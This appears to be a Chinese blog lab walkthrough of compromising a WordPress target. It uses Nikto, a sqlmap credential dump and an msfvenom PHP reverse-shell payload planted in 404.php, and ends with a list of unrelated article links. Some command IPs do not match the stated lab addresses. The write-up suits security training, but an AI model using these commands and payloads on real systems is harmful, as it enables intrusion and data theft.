使用反弹木马进行提权
2023-04-18 14:46:44 时间
渗透机:kail ip:172.16.5.6
靶 机:linux ip:172.16.5.7
客户端:windows XP ip: 172.16.5.128
通过Nikto对服务器80端口进行扫描:
nikto -host http://172.16.1.200
发现了login.php文件与phpmyadmin/目录
所以直接在浏览器中访问login.php
sqlmap -u “http://172.16.5.7/login.php” --forms --level 3 -D wordpress8080 -T users --dump
从这里我们就知道了用户名admin与密码SuperSecretPassword登录后台
接下来利用WordPress进行提权操作,基本上提权的方式有三种:
1.将一句话写到一个文件夹下并压缩成.zip格式上传
2.找到能编辑的php文件,将一句话写进去,然后使用菜刀来连接该一句话木马
3.通过php shell反弹木马并结合Meterpreter实现反弹连接
这里我们尝试以读写的方式生成一个shell.php文件。
然后使用windows里的中国菜刀来连接木马的地址
利用msf生成一个php格式的反弹木马脚本
msfvenom -p php/meterpreter/reverse_tcp LHOST=172.16.1.100 LPORT=886 -f raw > shell.php
打开msfconsole控制台
先不着急运行模块,先将木马源码复制出来上传到靶机,替换掉服务器的404.php页面内容,再次访问http://172.16.5.7:8080/wordpress/404.php来触发php反弹木马。
运行模块,成功进入后渗透。
相关文章
- 【技术种草】cdn+轻量服务器+hugo=让博客“云原生”一下
- CLB运维&运营最佳实践 ---访问日志大洞察
- vnc方式登陆服务器
- 轻松学排序算法:眼睛直观感受几种常用排序算法
- 十二个经典的大数据项目
- 为什么使用 CDN 内容分发网络?
- 大数据——大数据默认端口号列表
- Weld 1.1.5.Final,JSR-299 的框架
- JavaFX 2012:彻底开源
- 提升as3程序性能的十大要点
- 通过凸面几何学进行独立于边际的在线多类学习
- 利用行动影响的规律性和部分已知的模型进行离线强化学习
- ModelLight:基于模型的交通信号控制的元强化学习
- 浅谈Visual Source Safe项目分支
- 基于先验知识的递归卡尔曼滤波的代理人联合状态和输入估计
- 结合网络结构和非线性恢复来提高声誉评估的性能
- 最佳实践丨云开发CloudBase多环境管理实践
- TimeVAE:用于生成多变量时间序列的变异自动编码器
- 具有线性阈值激活的神经网络:结构和算法
- 内网渗透之横向移动 -- 从域外向域内进行密码喷洒攻击